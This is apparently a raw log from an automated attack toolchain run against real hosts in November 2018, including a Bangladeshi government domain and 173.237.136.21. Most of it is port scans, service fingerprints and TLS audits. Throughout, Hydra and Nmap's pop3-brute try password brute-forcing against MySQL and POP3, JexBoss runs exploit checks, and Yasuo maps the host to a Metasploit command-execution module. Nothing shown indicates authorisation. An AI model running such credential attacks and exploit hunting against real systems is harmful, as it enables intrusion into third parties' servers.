- + -- --=[Port 3306 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:18:43
- [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
- [DATA] attacking mysql://www.bpc.gov.bd:3306/
- [STATUS] 49.00 tries/min, 49 tries in 00:01h, 29 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:19:45
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:19:45
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:50 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.20s latency).
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- Nmap done: 1 IP address (1 host up) scanned in 23.12 seconds
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: Linux 2.4.X|2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
- OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 102.94 ms 10.251.200.1
- 2 103.36 ms 185.94.189.129
- 3 104.94 ms 185.206.226.109
- 4 105.12 ms 213.248.70.225
- 5 218.06 ms prs-bb4-link.telia.net (62.115.138.138)
- 6 222.38 ms 80.91.251.243
- 7 204.20 ms atl-b22-link.telia.net (62.115.125.191)
- 8 217.44 ms 80.91.246.75
- 9 222.00 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.75 ms 207.210.229.6
- 11 219.03 ms 174.136.31.214
- 12 ... 30
- ######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- # message authentication code algorithms
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:02 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 22/tcp closed ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 103.33 ms 10.251.200.1
- 2 110.54 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 103.47 ms 185.206.226.109
- 4 103.50 ms 213.248.70.225
- 5 219.92 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 220.92 ms 80.91.251.243
- 7 203.39 ms atl-b22-link.telia.net (62.115.125.191)
- 8 219.92 ms 80.91.246.75
- 9 220.49 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 220.48 ms 207.210.229.6
- 11 219.97 ms 174.136.31.218
- 12 220.15 ms 173.237.136.21
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:03 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain?
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- |_dns-nsec-enum: Can't determine domain for host 173.237.136.21; use dns-nsec-enum.domains script arg.
- |_dns-nsec3-enum: Can't determine domain for host 173.237.136.21; use dns-nsec3-enum.domains script arg.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 4.4 (93%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 - 4.9 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ list.quorum.to - FAIL
- |_dns-brute: Can't guess domain of "173.237.136.21"; use dns-brute.domain script argument.
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 103.29 ms 10.251.200.1
- 2 103.35 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 105.73 ms 185.206.226.109
- 4 105.76 ms 213.248.70.225
- 5 222.25 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 223.23 ms 80.91.251.243
- 7 201.37 ms atl-b22-link.telia.net (62.115.125.128)
- 8 222.03 ms 80.91.246.75
- 9 218.83 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 218.58 ms 207.210.229.6
- 11 218.27 ms 174.136.31.218
- 12 218.56 ms 173.237.136.21
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- http://173.237.136.21 [200 OK] Country[UNITED STATES][US], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel
- http://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, IP[173.237.136.21], Title[Default Web Site Page]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://173.237.136.21...
- ___________________ SITE INFO ___________________
- IP Title
- 173.237.136.21
- ____________________ VERSION ____________________
- Name Versions Type
- PHP 5.6.35 Platform
- __________________ INTERESTING __________________
- URL Note Type
- /phpinfo.php PHP info file Interesting
- _________________________________________________
- Time: 1.1 sec Urls: 598 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Fri, 23 Nov 2018 05:05:29 GMT
- Content-Type: text/html
- Last-Modified: Thu, 20 Oct 2016 16:22:47 GMT
- Content-Encoding: gzip
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:05 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 205 guesses in 181 seconds, average tps: 1.0
- |_pop3-capabilities: USER PIPELINING UIDL CAPA STLS AUTH-RESP-CODE TOP RESP-CODES SASL(PLAIN LOGIN)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 106.31 ms 173.237.136.21
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://173.237.136.21
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- https://173.237.136.21 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
- https://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHSTS
- PluginOpenSSLCipherSuites
- PluginSessionResumption
- PluginSessionRenegotiation
- PluginChromeSha1Deprecation
- PluginCertInfo
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 173.237.136.21:443 => 173.237.136.21:443
- SCAN RESULTS FOR 173.237.136.21:443 - 173.237.136.21:443
- --------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
- Common Name: *.myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
- Not Before: Jun 8 00:00:00 2018 GMT
- Not After: Jun 8 23:59:59 2020 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 51.14 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 443 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.myserverhosts.com
- Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Jun 8 00:00:00 2018 GMT
- Not valid after: Jun 8 23:59:59 2020 GMT
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21:8080
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://173.237.136.21:8080 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
- http://173.237.136.21:8080/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 8080 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://173.237.136.21:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21:8443
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://173.237.136.21:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 8443 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.myserverhosts.com
- Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Jun 8 00:00:00 2018 GMT
- Not valid after: Jun 8 23:59:59 2020 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginChromeSha1Deprecation
- PluginHeartbleed
- PluginSessionRenegotiation
- PluginCompression
- PluginCertInfo
- PluginHSTS
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 173.237.136.21:8443 => 173.237.136.21:8443
- SCAN RESULTS FOR 173.237.136.21:8443 - 173.237.136.21:8443
- ----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
- Common Name: *.myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
- Not Before: Jun 8 00:00:00 2018 GMT
- Not After: Jun 8 23:59:59 2020 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
- SRP-3DES-EDE-CBC-SHA timeout - timed out
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC3-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: https://173.237.136.21:8443 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- #######################################################################################################################################
- I, [2018-11-23T00:16:41.569567 #12203] INFO -- : Initiating port scan
- I, [2018-11-23T00:17:42.345289 #12203] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-16-41.xml
- I, [2018-11-23T00:17:42.346515 #12203] INFO -- : Discovered open port: 173.237.136.21:80
- I, [2018-11-23T00:17:43.324894 #12203] INFO -- : Discovered open port: 173.237.136.21:443
- I, [2018-11-23T00:17:45.121214 #12203] INFO -- : Discovered open port: 173.237.136.21:465
- I, [2018-11-23T00:17:46.524137 #12203] INFO -- : Discovered open port: 173.237.136.21:993
- I, [2018-11-23T00:17:48.741643 #12203] INFO -- : Discovered open port: 173.237.136.21:995
- I, [2018-11-23T00:17:50.962609 #12203] INFO -- : Discovered open port: 173.237.136.21:8443
- I, [2018-11-23T00:17:52.776201 #12203] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:21 EST
